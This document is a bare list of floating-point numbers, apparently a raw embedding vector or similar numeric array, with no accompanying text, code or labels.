0.002713910536840558, 0.01600257121026516, -0.0071214335039258, 0.030038900673389435, 0.0009857030818238854, -0.016035618260502815, -0.0014106552116572857, 0.02224002219736576, 0.03440098464488983, -0.018637998029589653, -0.035458460450172424, 0.01667175441980362, -0.019645903259515762, -0.03492972254753113, 0.0067496648989617825, 0.025544630363583565, 0.002519764704629779, -0.0189023669809103, -0.0443478599190712, -0.0003851935325656086, -0.019596334546804428, 0.025792477652430534, 0.03416966274380684, -0.020306825637817383, 0.023363588377833366, -0.011706579476594925, 0.009971658699214458, 0.0077080014161765575, -0.052873753011226654, 0.0010843250202015042, -0.013218438252806664, -0.012516207993030548, -0.009657721035182476, 0.0063531119376420975, 0.0021975652780383825, -0.048875175416469574, -0.03939094394445419, 0.03099723719060421, 0.031492929905653, -0.00533281359821558, -0.016688277944922447, -0.01766313798725605, 0.007051210384815931, -0.007059472147375345, -0.00022461017942987382, 0.009079414419829845, -0.010599534958600998, -0.00899679958820343, -0.0007290794746950269, 0.03509495407342911, -0.012103131972253323, 0.023099219426512718, 0.004742114804685116, -0.008641554042696953, -0.02473500184714794, -0.018274489790201187, -0.03056763857603073, -0.01815882883965969, 0.019381534308195114, -0.03207123652100563, 0.012185747735202312, 0.010822596028447151, 0.022140882909297943, -0.013623252511024475, 0.0010585077106952667, -0.016886554658412933, 0.0217608530074358, 0.010194720700383186, -0.028056135401129723, -0.057268884032964706, 0.00766669400036335, -0.006720749661326408, 0.003432663157582283, -0.0007807139772921801, -0.010814334265887737, 0.009732075035572052, 0.009046368300914764, 0.017481384798884392, 0.013259745202958584, -0.02376014180481434, 0.004618191625922918, -0.02908056415617466, -0.02290094457566738, -0.01943110302090645, 0.013714129105210304, 0.05102317035198212, -0.0033293941523879766, -0.008889399468898773, 0.0004450895939953625, 0.010830857791006565, -0.0022512651048600674, 0.005378251895308495, -0.02265309728682041, -0.03172425180673599, -0.011260456405580044, -0.018125783652067184, 0.0015707222046330571, -0.01774575375020504, 0.00601851986721158, -0.015895171090960503, -0.01412720512598753, -0.0011555806268006563, 0.028898809105157852, -0.00234214193187654, 0.03592110425233841, -0.036714211106300354, -0.016448693349957466, 0.005551743786782026, 0.041373711079359055, -0.05092403292655945, -0.003581370459869504, -0.020951224491000175, -0.005179975181818008, -0.00854241568595171, 0.0231487900018692, 0.01782836765050888, 0.029890192672610283, -0.007014033850282431, 0.020885132253170013, -0.027874380350112915, -0.02209131419658661, 0.0027118450962007046, 0.004291861783713102, -0.011268718168139458, 0.015771249309182167, 0.026767337694764137, 0.0033748324494808912, -0.008740692399442196, -0.022454820573329926, 0.0073114484548568726, 0.030617207288742065, -0.014151990413665771, 0.0030071947257965803, 0.012284886091947556, -0.007183394860476255, 0.00957510620355606, -0.04031623527407646, 0.001185528701171279, 0.013044945895671844, -0.004291861783713102, -0.020637286826968193, -0.02575943060219288, -0.013499329797923565, -0.015424264594912529, -0.008377185091376305, 0.027643058449029922, 0.006324196234345436, -0.00896375346928835, 0.0033211326226592064, 0.0038643276784569025, 0.00433316919952631, -0.01278883870691061, -0.022719189524650574, -0.03210427984595299, -0.005634359084069729, 0.03083200566470623, -0.012020517140626907, 0.004411653615534306, -0.03172425180673599, -0.0036495281383395195, 0.02891533263027668, 0.029064040631055832, 0.006035042926669121, -0.020852085202932358, 0.015217727050185204, -0.016514785587787628, -0.026023799553513527, 0.012871453538537025, 0.019811132922768593, 0.006795103196054697, 0.006968595087528229, 0.017365721985697746, 0.017597045749425888, 0.011103487573564053, 0.008781999349594116, 0.01966242678463459, 0.0039490084163844585, -0.008608507923781872, -0.0021645191591233015, 0.012194008566439152, -0.037540365010499954, -0.020885132253170013, 0.026122938841581345, 0.05171713978052139, -0.0015645259991288185, -0.027477826923131943, 0.009327259846031666, -0.003701162524521351, 0.014738557860255241, 0.005799589678645134, -0.02133125439286232, 0.002932840958237648, -0.0270977970212698, 0.03040240705013275, -0.011491779237985611, 0.05416255071759224, -0.020224209874868393, -0.0137554369866848, 0.009765121154487133, -0.016481740400195122, -0.036548979580402374, 0.011566133238375187, -0.01408589817583561, -0.007724524475634098, -0.014994665049016476, 0.010475612245500088, -0.026370784267783165, -0.0264203529804945, -0.030055422335863113, -0.007224702276289463, 0.0015779510140419006, 0.0012175420997664332, -0.007406455930322409, 0.016638709232211113, 0.019018027931451797, -0.014102420769631863, -0.017514429986476898, 0.021562576293945312, -0.026602106168866158, 0.02541244775056839, -0.002393776550889015, -0.03466535359621048, -0.024883709847927094, -0.017266584560275078, -0.013738913461565971, -0.032021664083004, 0.012549254111945629, -0.03965531289577484, 0.008178908377885818, 0.015771249309182167, -0.01966242678463459, 0.022537436336278915, -0.022884421050548553, 0.00010346267663408071, -0.014218082651495934, -0.005221283063292503, 0.0028543565422296524, -0.0199928879737854, 0.0006025749025866389, 0.0221739299595356, 0.11222454160451889, -0.022190453484654427, 0.0206703320145607, -0.016704801470041275, 0.024024510756134987, 0.015069019049406052, 0.00788149330765009, -0.006658788304775953, -0.00019414580310694873, 0.022388728335499763, 0.020769471302628517, 0.0038911777082830667, -0.006600957363843918, 0.007538640405982733, -0.0020839693024754524, -0.011830502189695835, -0.011822240427136421, -0.025379400700330734, 0.036548979580402374, -0.005865681916475296, -0.013391929678618908, 0.0075634247623384, 0.011673533357679844, -0.014936834573745728, 0.03443403169512749, -0.014688989147543907, -0.007629517000168562, -0.03816824033856392, -0.042464230209589005, -0.013838051818311214, -0.0048164683394134045, -0.023396635428071022, -0.02384275756776333, -0.008079770021140575, -0.000039435868529835716, 0.01033516600728035, 0.010715195909142494, -0.008162385784089565, -0.02400798723101616, -0.005155190825462341, 0.0021913691889494658, -0.002767610363662243, -0.02840311825275421, 0.014746819622814655, 0.011153057217597961, -0.010128628462553024, 0.007307317573577166, 0.0095833670347929, -0.0049156066961586475, 0.007389932870864868, 0.002662275917828083, -0.01641564816236496, 0.03509495407342911, 0.009889043867588043, 0.02091817744076252, 0.03691248968243599, -0.0036908357869833708, -0.020852085202932358, 0.007026426028460264, -0.0073486254550516605, 0.004192723426967859, 0.0009588531102053821, -0.02040596306324005, 0.017035262659192085, 0.008183038793504238, -0.00520889088511467, -0.025346355512738228, 0.00996339786797762, -0.023941894993185997, 0.020025933161377907, 0.012276624329388142, 0.009046368300914764, -0.007051210384815931, 0.0016037683235481381, 0.0007740015280432999, 0.010830857791006565, 0.03342612460255623, 0.03889525309205055, -0.025214171037077904, -0.0017638353165239096, 0.03033631481230259, 0.027857858687639236, -0.014631158672273159, 0.0275108739733696, 0.010392996482551098, 0.030187606811523438, -0.026536013931035995, -0.006072219926863909, -0.00039526226464658976, 0.0022698536049574614, 0.0003449186042416841, -0.002418561140075326, 0.03131117299199104, -0.0023028997238725424, 0.006629872601479292, 0.008162385784089565, 0.01665523089468479, -0.010764765553176403, -0.014730297029018402, -0.01121088769286871, -0.0057417587377130985, -0.009426398202776909, 0.014151990413665771, -0.019051073119044304, -0.003498755395412445, 0.000378481054212898, 0.005522828549146652, 0.010830857791006565, 0.0018815620569512248, -0.008265654556453228, -0.012177485972642899, -0.005060183349996805, 0.02582552284002304, -0.01054170448333025, -0.010145151056349277, 0.03023717738687992, 0.014920311979949474, -0.0038374776486307383, -0.012764054350554943, -0.019480673596262932, -0.02291746623814106, -0.03157554194331169, 0.04676022380590439, -0.018456244841217995, 0.0253298319876194, 0.000538031745236367, 0.0020777732133865356, -0.012202270328998566, 0.02215740643441677, 0.02000940963625908, 0.014052852056920528, 0.002556941471993923, -0.006902502849698067, -0.004473614972084761, 0.010797811672091484, -0.028535302728414536, 0.02007550187408924, 0.011508302763104439, -0.02100079320371151, 0.001267111161723733, -0.005295636598020792, 0.003267432563006878, 0.006138312164694071, 0.0012454247334972024, -0.02182694524526596, -0.007984763011336327, 0.000921676226425916, 0.012169224210083485, 0.007431240752339363, 0.015515141189098358, 0.005254329182207584, -0.030104992911219597, 0.0058532897382974625, 0.02782481163740158, -0.009550321847200394, 0.018869319930672646, 0.030716344714164734, -0.01188007090240717, 0.004535576328635216, -0.0006996477604843676, 0.0014695185236632824, -0.0032777595333755016, 0.017530953511595726, -0.012293146923184395, -0.01091347262263298, 0.023809710517525673, 0.010029490105807781, -0.04702459275722504, -0.011673533357679844, -0.02417321875691414, 0.009137244895100594, 0.00987252127379179, -0.0077823554165661335, 0.013391929678618908, 0.01976156421005726, 0.001285699661821127, -0.005663274321705103, 0.021099930629134178, 0.027312597259879112, -0.03949008509516716, -0.011524825356900692, 0.007592340465635061, 0.00510562164708972, 0.008253262378275394, 0.005336944479495287, -0.021380823105573654, -0.018274489790201187, 0.010682149790227413, -0.03509495407342911, 0.007266010157763958, -0.006196142639964819, 0.033971384167671204, -0.009492490440607071, -0.0018103063339367509, 0.01103739533573389, -0.013672822155058384, -0.012549254111945629, -0.012375762686133385, -0.0009779578540474176, 0.008203692734241486, -0.003785843262448907, -0.018869319930672646, -0.007034687325358391, -0.0011690056417137384, -0.0077410475350916386, -0.020934700965881348, -0.021017316728830338, 0.014556804671883583, -0.006716618780046701, -0.0004884625668637455, -0.00936856772750616, 0.011351333931088448, 0.0029596907552331686, -0.007042949087917805, -0.0004822664486709982, 0.005968950688838959, -0.00788149330765009, -0.014953358098864555, -0.001814437098801136, 0.002699452918022871, -0.009732075035572052, 0.008046723902225494, 0.012433593161404133, -0.018522335216403008, -0.003938681446015835, 0.028122225776314735, 0.023049650713801384, -0.046033211052417755, 0.012020517140626907, 0.0405145138502121, -0.035458460450172424, -0.013325837440788746, -0.010673888958990574, -0.0004897534381598234, -0.013400191441178322, -0.017960552126169205, 0.02316531166434288, 0.009252906776964664, -0.0108804265037179, 0.007848447188735008, -0.0015263165114447474, -0.015341649763286114, -0.013020161539316177, 0.006832280196249485, -0.007042949087917805, -0.000049343241698807105, -0.009228122420608997, -0.020356394350528717, -0.014969880692660809, 0.034037478268146515, -0.0008943099528551102, 0.0005633326363749802, 0.0012578170280903578, -0.005795458797365427, -0.009467706084251404, 0.029394501820206642, 0.005130406003445387, 0.002947298577055335, 0.0018939543515443802, -0.012260100804269314, -0.004956914111971855, -0.0018702024826779962, 0.0015149569371715188, 0.012970591895282269, -0.019711995497345924, 0.031145945191383362, -0.01906759664416313, 0.0053452057763934135, 0.0169113390147686, -0.004750376101583242, 0.019976364448666573, -0.0020364655647426844, -0.0124583775177598, -0.01503597293049097, -0.009228122420608997, -0.0004277920234017074, 0.005241937004029751, -0.015060757286846638, 0.015325126238167286, -0.00854241568595171, -0.016382601112127304, 0.06001170724630356, 0.0022595266345888376, -0.02233915962278843, 0.01924934983253479, -0.0358550138771534, -0.02623859979212284, -0.018390152603387833, -0.01908412016928196, -0.008839830756187439, 0.00924464501440525, -0.0021893037483096123, -0.0007337265997193754, -0.019216304644942284, 0.0151268495246768, 0.009393352083861828, -0.011822240427136421, 0.004494268912822008, -0.009624674916267395, 0.006654657423496246, 0.0022843112237751484, 0.037936918437480927, 0.016729585826396942, 0.010269073769450188, -0.010434304364025593, 0.0030443714931607246, 0.00017026484420057386, -0.013532375916838646, -0.0010781288146972656, -0.016266940161585808, -0.003079483052715659, -0.017861414700746536, -0.018885843455791473, -0.025214171037077904, -0.004861906636506319, -0.019480673596262932, 0.002079838654026389, -0.003420270746573806, -0.01825796812772751, 0.017134400084614754, 0.015234249643981457, -0.011400902643799782, -0.05743411183357239, -0.026122938841581345, -0.0024970455560833216, 0.009905566461384296, 0.001600670162588358, 0.002232676837593317, -0.0014344070805236697, -0.028535302728414536, 0.019612858071923256, 0.0020023868419229984, 0.031625114381313324, 0.012871453538537025, -0.0019393926486372948, -0.02800656482577324, 0.02240525186061859, -0.00782779324799776, -0.022140882909297943, 0.0057871975004673, -0.04239813983440399, 0.013681082986295223, -0.004985829349607229, 0.030980713665485382, 0.02765958197414875, -0.007621255703270435, 0.012640131637454033, 0.003918027505278587, 0.006902502849698067, -0.03347569331526756, -0.011235672049224377, -0.011640487238764763, 0.001680187415331602, 0.012326193042099476, -0.0017886199057102203, 0.012904499657452106, 0.0005233159172348678, 0.02182694524526596, 0.01336714532226324, -0.016465216875076294, -0.027857858687639236, 0.020554671064019203, -0.007220571860671043, -0.008938968181610107, 0.025362877175211906, -0.01275579258799553, 0.009905566461384296, 0.014804650098085403, 0.008641554042696953, -0.01799359917640686, -0.01416025124490261, 0.010070797055959702, 0.01508554257452488, 0.016357816755771637, 0.003899439238011837, -0.007414717692881823, 0.010872164741158485, -0.01840667426586151, -0.017778798937797546, 0.03344264626502991, 0.003476036014035344, -0.016680017113685608, 0.0028543565422296524, 0.013317576609551907, -0.023033127188682556, 0.008265654556453228, -0.0021046232432127, 0.013937190175056458, 0.010822596028447151, -0.01665523089468479, 0.003498755395412445, 0.0031125289388000965, 0.011954424902796745, 0.04008491337299347, -0.001847483217716217, 0.008922445587813854, -0.008972014300525188, -0.008278046734631062, -0.02357838861644268, 0.001809273730032146, 0.013152346014976501, -0.004597538150846958, -0.007361017633229494, 0.010830857791006565, 0.01691959984600544, 0.02200869843363762, 0.013177130371332169, 0.007844316773116589, 0.030600683763623238, -0.01591169461607933, 0.01124393381178379, 0.00501887546852231, -0.01278883870691061, -0.01715092360973358, -0.019546765834093094, 0.01575472578406334, 0.008550677448511124, 0.01216096244752407, -0.023644480854272842, -0.006662918720394373, 0.02590813860297203, -0.0036887703463435173, -0.024057557806372643, -0.029774531722068787, 0.012375762686133385, -0.021281685680150986, -0.0022409383673220873, -0.010938256978988647, -0.012970591895282269, -0.011954424902796745, -0.006885979790240526, -0.009930351749062538, 0.0008344139205291867, 0.004465353675186634, 0.019976364448666573, 0.009765121154487133, -0.01616780273616314, -0.003442989895120263, -0.007662563119083643, -0.000167812206200324, 0.00040739637915976346, -0.0017297564772889018, -0.01467246562242508, -0.0010925865499302745, -0.013466283679008484, -0.012615346349775791, -0.004688414745032787, -0.009021583944559097, -0.006196142639964819, -0.011475256644189358, 0.011483517475426197, 0.005378251895308495, 0.018687566742300987, 0.003498755395412445, 0.004428176674991846, 0.005266721360385418, 0.00023868058633524925, -0.00443643843755126, -0.004089454188942909, 0.017877936363220215, 0.016770893707871437, -0.003213732736185193, 0.013796744868159294, 0.014028067700564861, 0.009624674916267395, 0.020934700965881348, -0.0044199153780937195, 0.014697250910103321, 0.008054985664784908, -0.004866037517786026, 0.01591169461607933, 0.004366215318441391, 0.006481165532022715, 0.0008896628278307617, 0.006567911244928837, -0.01591995544731617, -0.007637778762727976, -0.016936123371124268, -0.006617480423301458, -0.0063159349374473095, -0.0009795068763196468, 0.01545731071382761, -0.0021562576293945312, 0.010690411552786827, -0.009938612580299377, -0.010186458937823772, -0.006836411077529192, 0.00777409365400672, 0.008649814873933792, 0.021529531106352806, 0.0043538231402635574, 0.01103739533573389, -0.0014643550384789705, -0.00645638071000576, 0.022223498672246933, 0.012640131637454033, 0.015779510140419006, 0.014887265861034393, 0.009112460538744926, -0.03380615636706352, -0.010029490105807781, -0.012045301496982574, 0.02608989179134369, -0.009674244560301304, 0.0026787989772856236, 0.0020168444607406855, 0.0002948331239167601, 0.017233537510037422, 0.0020767406094819307, -0.016316508874297142, -0.00477103004232049, -0.016803938895463943, -0.0206703320145607, -0.004911475814878941, 0.0113678565248847, -0.0020158118568360806, -0.0035586513113230467, -0.012871453538537025, -0.02832050248980522, -0.009690767154097557, 0.009426398202776909, 0.01875365898013115, -0.0029596907552331686, -0.02316531166434288, 0.007935193367302418, 0.014383312314748764, 0.012359239161014557, 0.004799945279955864, 0.0008705580839887261, -0.0206703320145607, 0.005341074895113707, 0.016465216875076294, -0.014325481839478016, 0.0062457118183374405, -0.0024578033480793238, -0.002371057402342558, 0.006163096521049738, -0.005043660290539265, 0.011202625930309296, -0.013301053084433079, 0.011235672049224377, -0.004766899161040783, 0.000576241291128099, 0.020356394350528717, 0.0072825332172214985, -0.01825796812772751, -0.010252551175653934, 0.003924223594367504, -0.015069019049406052, 0.007071864325553179, 0.01021124329417944, 0.0048949527554214, 0.006117658223956823, -0.00023790606064721942, 0.0018030775245279074, 0.013102776370942593, -0.0027965258341282606, -0.006600957363843918, 0.008195431903004646, 0.01776227541267872, 0.009327259846031666, -0.01850581355392933, 0.019398057833313942, -0.005411298014223576, 0.006757926195859909, -0.0004657433892134577, -0.0013961974764242768, 0.003075352171435952, 0.0012795034563168883, -0.01976156421005726, 0.0062746270559728146, -0.0010156510397791862, 0.010112104937434196, 0.00808803178369999, -0.0009960299357771873, 0.010971303097903728, 0.010161674581468105, -0.023033127188682556, -0.010293858125805855, 0.008021939545869827, 0.013557160273194313, 0.0009939646115526557, -0.03268258646130562, -0.0018485159380361438, -0.011904855258762836, -0.014185036532580853, 0.012797100469470024, 0.006989249028265476, -0.01817535236477852, 0.005597182083874941, 0.015217727050185204, 0.03144335746765137, -0.0191667340695858, 0.0021934346295893192, -0.001643010531552136, -0.02007550187408924, -0.012598823755979538, -0.013805005699396133, -0.025263739749789238, 0.0067083570174872875, -0.01725006103515625, 0.006431596353650093, -0.0062746270559728146, -0.017266584560275078, -0.01706830784678459, 0.0024020380806177855, 0.025131555274128914, -0.01573820225894451, -0.014936834573745728, -0.014218082651495934, 0.0012319997185841203, 0.007356886751949787, -0.002451607258990407, 0.002651949180290103, 0.003918027505278587, -0.005593051668256521, 0.0007471515564247966, -0.017514429986476898, -0.013730652630329132, -0.026800382882356644, 0.011062180623412132, -0.0010388866066932678, 0.0043538231402635574, 0.002786198863759637, 0.007294925395399332, -0.010690411552786827, 0.00522954436019063, -0.029791055247187614, 0.009930351749062538, -0.029642347246408463, 0.010987826623022556, 0.007270141039043665, 0.011855286546051502, 0.015969526022672653, -0.010343427769839764, 0.02949363924562931, -0.02349577285349369, -0.00111014221329242, 0.0001556780916871503, 0.006163096521049738, 0.002100492361932993, -0.0025548762641847134, -0.004163807723671198, 0.011053918860852718, -0.006291150115430355, 0.010128628462553024, 0.02366100437939167, -0.0025982491206377745, 0.002105655847117305, 0.015300341881811619, -0.00042469394975341856, 0.013152346014976501, -0.01100434921681881, 0.013069730252027512, 0.020372917875647545, -0.0017359526827931404, -0.0024371494073420763, 0.007687347941100597, 0.017778798937797546, 0.012384024448692799, 0.00988078210502863, 0.006138312164694071, -0.01466420479118824, -0.0006598891923204064, 0.0011772671714425087, 0.010112104937434196, -0.007042949087917805, 0.028270933777093887, 0.01673784665763378, 0.006576173007488251, -0.012350978329777718, 0.019645903259515762, -0.012978853657841682, 0.005964820273220539, -0.02283485233783722, -0.0036392011679708958, 0.0013218438252806664, -0.0030691560823470354, -0.017861414700746536, -0.009657721035182476, 0.004498399794101715, -0.0015201203059405088, -0.007191656157374382, -0.01554818730801344, -0.010128628462553024, -0.03281477093696594, -0.004167938604950905, -0.005927643273025751, -0.00027960093575529754, -0.00391389662399888, 0.0099964439868927, -0.002972083166241646, 0.010426042601466179, -0.0008881138055585325, -0.004254684783518314, -0.0302536990493536, -0.010442566126585007, 0.0068529341369867325, -0.0028357680421322584, 0.013978498056530952, 0.027775242924690247, 0.0033913555089384317, 0.0036309396382421255, 0.001776227611117065, -0.0035916974302381277, -0.002841964131221175, 0.01487900409847498, -0.000635620963294059, 0.014837696217000484, 0.0010001607006415725, 0.02081904001533985, -0.015267295762896538, 0.0032922171521931887, 0.013342360965907574, -0.0032736286520957947, 0.011813978664577007, 0.008501107804477215, -0.007451894227415323, 0.029559731483459473, 0.005576528608798981, -0.017349200323224068, 0.008476323448121548, 0.011508302763104439, -0.0019445561338216066, 0.004535576328635216, 0.0014974011573940516, -0.02741173654794693, -0.015325126238167286, -0.00941813737154007, -0.004174134694039822, -0.0036309396382421255, 0.03684639558196068, 0.022289590910077095, 0.004428176674991846, -0.000021557412765105255, -0.010021228343248367, 0.009756859391927719, -0.015721678733825684, -0.010797811672091484, 0.004663629923015833, 0.02392537333071232, -0.004923867993056774, -0.006803364958614111, 0.011533087119460106, -0.0010512789012864232, 0.008732430636882782, -0.007038818206638098, 0.004717329982668161, -0.017051784321665764, 0.018026644363999367, -0.003056763671338558, -0.009434659965336323, -0.012218793854117393, -0.0038705237675458193, 0.0077493092976510525, 0.0011721036862581968, -0.013945451937615871, 0.004597538150846958, -0.00277174124494195, -0.013111038133502007, 0.004994091112166643, 0.0019879292231053114, 0.011186103336513042, 0.016052139922976494, -0.0035545206628739834, -0.001138024847023189, -0.002185173099860549, 0.0016884489450603724, -0.006757926195859909, 0.0027593488339334726, -0.020224209874868393, -0.009013322181999683, 0.030964190140366554, -0.014201559126377106, -0.009550321847200394, -0.002199630718678236, 0.01634129323065281, -0.01766313798725605, 0.010979564860463142, -0.006634003482758999, 0.023611433804035187, 0.007224702276289463, -0.02648644521832466, -0.004742114804685116, 0.030716344714164734, -0.0033583093900233507, -0.009467706084251404, 0.00468428386375308, 0.008815045468509197, -0.019778087735176086, 0.0014839761424809694, -0.013738913461565971, -0.016894815489649773, -0.006617480423301458, -0.0018278621137142181, 0.007199917919933796, -0.02858487144112587, 0.0005576528492383659, 0.0011266652727499604, -0.017563998699188232, -0.0012206401443108916, -0.02699865959584713, 0.006481165532022715, -0.01257403939962387, 0.016688277944922447, 0.016952646896243095, 0.0025115031749010086, -0.002738695126026869, 0.015250773169100285, 0.0034781014546751976, -0.019728519022464752, 0.009525536559522152, -0.008823307231068611, 0.010516920126974583, -0.006460511591285467, -0.0043455613777041435, 0.002004452282562852, 0.016010832041502, 0.01906759664416313, -0.015151634812355042, 0.018456244841217995, 0.0006650526775047183, -0.0028915333095937967, -0.016936123371124268, -0.020389441400766373, 0.0007259813719429076, 0.0012247709091752768, -0.014821173623204231, -0.012607085518538952, -0.00945118349045515, 0.0036371357273310423, -0.011202625930309296, -0.020306825637817383, -0.01583734154701233, -0.001866071717813611, -0.010062536224722862, 0.009054630063474178, -0.013177130371332169, -0.011359594762325287, 0.03360787779092789, 0.000036047353205503896, -0.006477034650743008, 0.006522472947835922, 0.001723560388199985, 0.007257748395204544, -0.011078703217208385, 0.020785992965102196, 0.0038312815595418215, -0.02290094457566738, -0.005101490765810013, 0.010632581077516079, 0.016266940161585808, -0.005460867192596197, 0.01054170448333025, 0.017811845988035202, -0.010434304364025593, -0.005159321706742048, -0.031625114381313324, -0.020058980211615562, -0.0015800164546817541, 0.001066769240424037, 0.005076706409454346, -0.002428887877613306, -0.0361524261534214, -0.00854241568595171, -0.01458158902823925, -0.015225987881422043, -0.000566947041079402, -0.01706830784678459, -0.006365504115819931, -0.006799234077334404, -0.0037362740840762854, 0.0032034057658165693, 0.021232115104794502, 0.0024495418183505535, 0.0029824101366102695, -0.007071864325553179, -0.011491779237985611, -0.021975653246045113, 0.019695471972227097, 0.015531664714217186, 0.005927643273025751, 0.0013889686670154333, -0.0011390575673431158, 0.0020726097282022238, -0.005948297213762999, 0.011301764287054539, 0.009723813273012638, -0.0053534675389528275, -0.015531664714217186, 0.003147640498355031, 0.009806429035961628, -0.007034687325358391, 0.021959129720926285, 0.02817179635167122, -0.0025590069126337767, 0.004362084437161684, 0.0055434824898839, 0.006757926195859909, -0.005539351608604193, 0.0017029065638780594, 0.0027841334231197834, 0.011937901377677917, 0.021132977679371834, -0.0033397208899259567, 0.012598823755979538, 0.0007326938793994486, 0.00001424790116288932, -0.009930351749062538, 0.006914895493537188, 0.012780576944351196, 0.011896594427525997, -0.011813978664577007, 0.01008732058107853, 0.01900150440633297, 0.00011591950169531628, -0.026618629693984985, -0.024801094084978104, -0.006299411877989769, 0.008484585210680962, 0.01224357821047306, 0.008922445587813854, -0.0027015183586627245, -0.006840541493147612, 0.0033355902414768934, -0.01616780273616314, 0.011599179357290268, -0.0043868692591786385, -0.006472903769463301, -0.005427821073681116, 0.0007011968409642577, -0.00833174679428339, 0.022950513288378716, 0.007555163465440273, -0.040117960423231125, 0.004775160923600197, 0.013986759819090366, -0.0011307960376143456, 0.0006536930450238287, -0.015201203525066376, -0.02215740643441677, -0.006638134364038706, 0.013928929343819618, -0.027643058449029922, -0.008509369567036629, -0.014589850790798664, -0.0015893105883151293, 0.008534153923392296, 0.0001840770710259676, -0.01617606356739998, 0.02808918058872223, 0.017448337748646736, -0.02417321875691414, 0.006204404402524233, -0.02765958197414875, -0.0038932431489229202, -0.011706579476594925, -0.008897661231458187, 0.026304692029953003, -0.018307536840438843, -0.01291276142001152, -0.009252906776964664, 0.00610526604577899, -0.001790685229934752, -0.010434304364025593, -0.0068777184933424, -0.02656906098127365, -0.026370784267783165, -0.001913575455546379, -0.0014488646993413568, -0.0040130349807441235, 0.005564136430621147, -0.002375188050791621, -0.00498169893398881, -0.002734564244747162, -0.004581015091389418, -0.004618191625922918, -0.016878293827176094, -0.010434304364025593, -0.008517631329596043, -0.02448715642094612, -0.005184106063097715, -0.008154124021530151, -0.016275200992822647, -0.0030650252010673285, -0.018786704167723656, 0.0007166871801018715, 0.0032178633846342564, 0.021893037483096123, -0.005093229468911886, 0.01420982088893652, -0.007129694800823927, 0.014945096336305141, 0.0005426788120530546, 0.009054630063474178, 0.00005795975084765814, 0.0024309533182531595, -0.00029096053913235664, 0.005217152182012796, -0.008757214993238449, -0.003709424054250121, -0.005634359084069729, -0.013705868273973465, 0.006324196234345436, -0.01221053209155798, -0.013094514608383179, 0.004023361951112747, 0.02250439114868641, 0.006026781629770994, -0.006993379909545183, 0.005365859717130661, 0.014482450671494007, -0.017563998699188232, -0.021132977679371834, 0.00522541394457221, -0.01801012083888054, -0.01891888864338398, 0.015787770971655846, -0.006993379909545183, -0.009277691133320332, 0.007972369901835918, -0.01158265583217144, 0.0022306113969534636, -0.03243474289774895, -0.024354971945285797, -0.016200847923755646, -0.012474901042878628, -0.027031704783439636, 0.01576298661530018, -0.007232964038848877, 0.01316060684621334, 0.002953494666144252, 0.005597182083874941, -0.003775516292080283, 0.018307536840438843, -0.0006924189510755241, 0.006844672374427319, 0.016613924875855446, -0.004271207842975855, 0.02215740643441677, 0.0034367938060313463, -0.012681438587605953, -0.013177130371332169, 0.020356394350528717, -0.017316153272986412, -0.004287730902433395, -0.008748953230679035, 0.012507947161793709, 0.01141742616891861, -0.00023287169460672885, -0.00022990271099843085, 0.028303980827331543, -0.01257403939962387, -0.03342612460255623, -0.009071152657270432, -0.004267076961696148, 0.015391218475997448, 0.006902502849698067, -0.004956914111971855, -0.0048123374581336975, 0.004275338724255562, -0.025346355512738228, -0.0007900082273408771, -0.009484229609370232, 0.022223498672246933, -0.01045082788914442, -0.01799359917640686, -0.015052496455609798, -0.031360745429992676, 0.029014471918344498, 0.021859992295503616, 0.004977568052709103, -0.01000470481812954, 0.0009304541163146496, 0.0007404390489682555, 0.011268718168139458, -0.009781643748283386, -0.0217608530074358, 0.02625512145459652, -0.006716618780046701, -0.020372917875647545, -0.001000677002593875, 0.026602106168866158, -0.015639064833521843, 0.0003733175981324166, -0.004614061210304499, 0.008265654556453228, -0.0011979208793491125, 0.027130844071507454, 0.023066174238920212, -0.008133470080792904, 0.00757994782179594, 0.0058491588570177555, -0.033128708600997925, -0.0018691697623580694, -0.007402325049042702, -0.00023067723668646067, 0.03355830907821655, 0.0005834701005369425, -0.003067090641707182, 0.002753152744844556, -0.000440442468971014, 0.009153768420219421, 0.01012036669999361, -0.007435371167957783, -0.004514922853559256, -0.014515496790409088, -0.0010394029086455703, 0.017597045749425888, -0.0032219942659139633, -0.011227410286664963, -0.0082119544968009, -0.0012722746469080448, -0.0008891464676707983, 0.014176774770021439, -0.008017809130251408, -0.015011188574135303, -0.008195431903004646, 0.0007523149834014475, -0.007893885485827923, 0.009855997748672962, -0.02582552284002304, 0.010401258245110512, 0.007513855583965778, -0.0036040896084159613, 0.013705868273973465, -0.00510562164708972, -0.011648748070001602, 0.014622896909713745, -0.03283129632472992, 0.01633303239941597, -0.0033975515980273485, -0.002018909901380539, 0.031046805903315544, 0.009550321847200394, -0.00037021952448412776, 0.003504951484501362, -0.016019094735383987, -0.010500396601855755, 0.000611869094427675, -0.01121088769286871, -0.016894815489649773, 0.017712706699967384, -0.003938681446015835, -0.01643216982483864, 0.006328327115625143, -0.007823662832379341, -0.012532731518149376, -0.00587807409465313, -0.0048825605772435665, -0.028766624629497528, 0.010269073769450188, -0.0040832580998539925, 0.006390288472175598, -0.003385159419849515, 0.0016306182369589806, -0.02057119458913803, -0.013111038133502007, 0.028138749301433563, 0.004775160923600197, 0.009773382917046547, 0.011813978664577007, -0.00035782725899480283, 0.015168157406151295, -0.01575472578406334, -0.014052852056920528, -0.000277535553323105, 0.0306667760014534, -0.02065380848944187, -0.000018346390788792633, -0.011549609713256359, 0.005217152182012796, -0.005031268112361431, 0.022867897525429726, 0.022933989763259888, 0.019711995497345924, -0.005080837290734053, 0.0072784023359417915, -0.024454109370708466, -0.005597182083874941, -0.00009449118078919128, 0.0007967206765897572, 0.006514211650937796, -0.008674600161612034, -0.0010332068195566535, -0.012136178091168404, 0.011524825356900692, -0.022520912811160088, 0.0004982731188647449, 0.022273067384958267, -0.008608507923781872, -0.004506661090999842, -0.019860703498125076, 0.008509369567036629, -0.00034750034683384, -0.009360305964946747, -0.011128272861242294, -0.014069374650716782, 0.02858487144112587, -0.0024350841995328665, 0.011946163140237331, -0.005390644073486328, 0.006163096521049738, -0.02473500184714794, -0.012929284945130348, 0.004742114804685116, -0.01278883870691061, 0.00941813737154007, 0.004940391052514315, 0.0015634933952242136, -0.003967596683651209, 0.015019450336694717, 0.003126986790448427, 0.015044234693050385, 0.007955847308039665, 0.006225057877600193, 0.01684524677693844, -0.005109752528369427, -0.0007982696988619864, -0.019216304644942284, 0.008525892160832882, -0.002680864417925477, 0.008625030517578125, -0.015275557525455952, -0.007327971514314413, -0.005944166332483292, 0.0020973943173885345, -0.00299067166633904, 0.017597045749425888, 0.04490964114665985, -0.00161409517750144, -0.023809710517525673, -0.0014788127737119794, 0.016556093469262123, 